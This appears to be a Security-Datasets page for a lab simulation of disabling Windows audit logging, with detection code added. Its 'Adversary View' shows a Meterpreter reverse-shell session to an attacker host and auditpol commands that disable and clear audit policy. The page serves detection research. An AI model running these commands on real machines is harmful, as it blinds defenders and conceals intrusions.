Disabling Windows Event Logging via Audit Policy Modification#

Metadata#

Contributors

Jose Rodriguez @Cyb3rPandaH

Creation Date

2022/06/30

Modification Date

2022/08/18

Tactics

TA0005

Techniques

T1562.002

Tags

auditpol,cmd,microsoft windows security auditing

Dataset Description#

After obtaining a shell with elevated privileges on the target, we used auditpol.exe to modify the current system-wide and per-user audit policies. Success and failure auditing was disabled with the /set, /remove and /clear subcommands and the /success:disable and /failure:disable parameters. This dataset was generated using Windows 10 Pro (Version 1903, OS Build 18362.30) and Kali Linux (Version 2022.2).

Simulation Metadata#

Tools#

| Type | Name | Module |
| --- | --- | --- |
| Manual | auditpol.exe | auditpol.exe |

Adversary View#

msf6 exploit(multi/handler) > run 
[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: gytdwvr9) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 3 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 09:56:27 -0400 
meterpreter > execute -f auditpol.exe -H -a '/set /user:pedro /category:"DS Access" /success:disable' 
Process 4392 created.
meterpreter > execute -f auditpol.exe -H -a '/set /user:pedro /category:"DS Access" /failure:disable' 
Process 6664 created. 
meterpreter > execute -f auditpol.exe -H -a '/remove /user:pedro' 
Process 4440 created. 
meterpreter > execute -f auditpol.exe -H -a '/set /category:"Account Logon" /success:disable' 
Process 472 created. 
meterpreter > execute -f auditpol.exe -H -a '/set /category:"Account Logon" /failure:disable' 
Process 2752 created. 
meterpreter > execute -f auditpol.exe -H -a '/clear /y' 
Process 7016 created. 
meterpreter > 

Explore Datasets#

Download & Decompress Dataset#

import requests
from io import BytesIO
from zipfile import ZipFile

# Raw URL of the compressed dataset in the OTRF Security-Datasets repository
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/auditpol_system_user_auditpolicy_modification.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# The archive contains a single newline-delimited JSON file; extract it to the working directory
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

import pandas as pd

# One JSON object per line, one row per Windows event
df = pd.read_json(datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)
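As an added worked example that is not part of the original notebook, the following Python builds the detection logic a practitioner would run next over this kind of data: it pairs the auditpol.exe process-creation events (Sysmon event 1 or Security 4688) whose command line carries a policy-modifying subcommand with the Security events Windows writes when the policy actually changes (4719 for the system policy, 4912 for the per-user policy), and decodes the AuditPolicyChanges resolution codes. It runs offline over constructed sample events that mimic the flattened per-event JSON layout read above; the field names (Channel, EventID, Image, NewProcessName, CommandLine, AuditPolicyChanges) follow the Windows event data names and are assumed to match the dataset's columns, and the hostname and user names are made up.

```python
import re
import pandas as pd

# Windows resolution strings for the AuditPolicyChanges field of events 4719/4912.
AUDIT_CHANGE_CODES = {
    "%%8448": "Success removed",
    "%%8449": "Success added",
    "%%8450": "Failure removed",
    "%%8451": "Failure added",
}

# auditpol subcommands that change policy; /get, /list and /backup are read-only.
# /restore is included although the dataset above does not exercise it.
MODIFYING_SUBCOMMAND = re.compile(r"/(set|remove|clear|restore)\b", re.IGNORECASE)

# Constructed sample events (not from the dataset) in the flattened per-event
# JSON layout the notebook reads; field names are assumed to match the dataset.
SAMPLE_EVENTS = [
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Hostname": "WIN10-LAB",
     "Image": "C:\\Windows\\System32\\auditpol.exe",
     "CommandLine": 'auditpol.exe /set /user:pedro /category:"DS Access" /success:disable'},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Hostname": "WIN10-LAB",
     "Image": "C:\\Windows\\System32\\auditpol.exe",
     "CommandLine": "auditpol.exe /get /category:*"},  # read-only query, should not alert
    {"Channel": "Security", "EventID": 4688, "Hostname": "WIN10-LAB",
     "NewProcessName": "C:\\Windows\\System32\\auditpol.exe",
     "CommandLine": "auditpol /clear /y"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Hostname": "WIN10-LAB",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
    {"Channel": "Security", "EventID": 4912, "Hostname": "WIN10-LAB",
     "SubjectUserName": "admin", "AuditPolicyChanges": "%%8448"},
    {"Channel": "Security", "EventID": 4719, "Hostname": "WIN10-LAB",
     "SubjectUserName": "admin", "AuditPolicyChanges": "%%8448, %%8450"},
    {"Channel": "Security", "EventID": 4624, "Hostname": "WIN10-LAB", "SubjectUserName": "admin"},
]


def _field(row, *names) -> str:
    """First non-empty string among the named columns (missing columns are NaN)."""
    for name in names:
        value = row.get(name)
        if isinstance(value, str) and value:
            return value
    return ""


def is_auditpol_modification(row) -> bool:
    """True for a process-creation event launching auditpol with a policy-changing subcommand."""
    image = _field(row, "Image", "NewProcessName")  # Sysmon 1 vs. Security 4688 naming
    if not image.lower().endswith("\\auditpol.exe"):
        return False
    return MODIFYING_SUBCOMMAND.search(_field(row, "CommandLine")) is not None


def auditpol_process_events(df: pd.DataFrame) -> pd.DataFrame:
    """Process-creation events (Sysmon 1 or Security 4688) that modify audit policy via auditpol."""
    sysmon = (df["Channel"] == "Microsoft-Windows-Sysmon/Operational") & (df["EventID"] == 1)
    security = (df["Channel"] == "Security") & (df["EventID"] == 4688)
    proc = df[sysmon | security]
    if proc.empty:
        return proc
    return proc[proc.apply(is_auditpol_modification, axis=1)]


def decode_changes(value) -> str:
    """AuditPolicyChanges may hold several comma-separated codes; decode each one."""
    codes = [c.strip() for c in str(value).split(",") if c.strip()]
    return ", ".join(AUDIT_CHANGE_CODES.get(c, c) for c in codes)


def audit_policy_change_events(df: pd.DataFrame) -> pd.DataFrame:
    """Security 4719 (system policy) and 4912 (per-user policy) events with decoded changes."""
    sec = df[(df["Channel"] == "Security") & (df["EventID"].isin([4719, 4912]))].copy()
    sec["Scope"] = sec["EventID"].map({4719: "system", 4912: "per-user"})
    raw = sec["AuditPolicyChanges"] if "AuditPolicyChanges" in sec.columns else pd.Series("", index=sec.index)
    sec["Change"] = raw.map(decode_changes)
    return sec


def summarize(df: pd.DataFrame) -> dict:
    """Counts a responder would want on one screen for this technique."""
    procs = auditpol_process_events(df)
    changes = audit_policy_change_events(df)
    return {
        "auditpol_modifying_launches": int(len(procs)),
        "system_policy_changes": int((changes["Scope"] == "system").sum()),
        "per_user_policy_changes": int((changes["Scope"] == "per-user").sum()),
        "changes": sorted(changes["Change"].tolist()),
    }


DF = pd.DataFrame(SAMPLE_EVENTS)

if __name__ == "__main__":
    print(auditpol_process_events(DF)[["Channel", "EventID", "CommandLine"]])
    print(audit_policy_change_events(DF)[["EventID", "Scope", "Change"]])
    print(summarize(DF))
```

Two caveats when running this against real telemetry: Security 4688 only carries the command line when "Include command line in process creation events" is enabled, so without Sysmon the /set and /clear arguments are invisible and only the image name remains; and a /clear /y that strips auditing from every subcategory typically produces a burst of 4719 events rather than one, which is itself a useful signal. Microsoft documents 4719 as being logged regardless of the Audit Policy Change subcategory setting, so disabling that subcategory first does not hide the change.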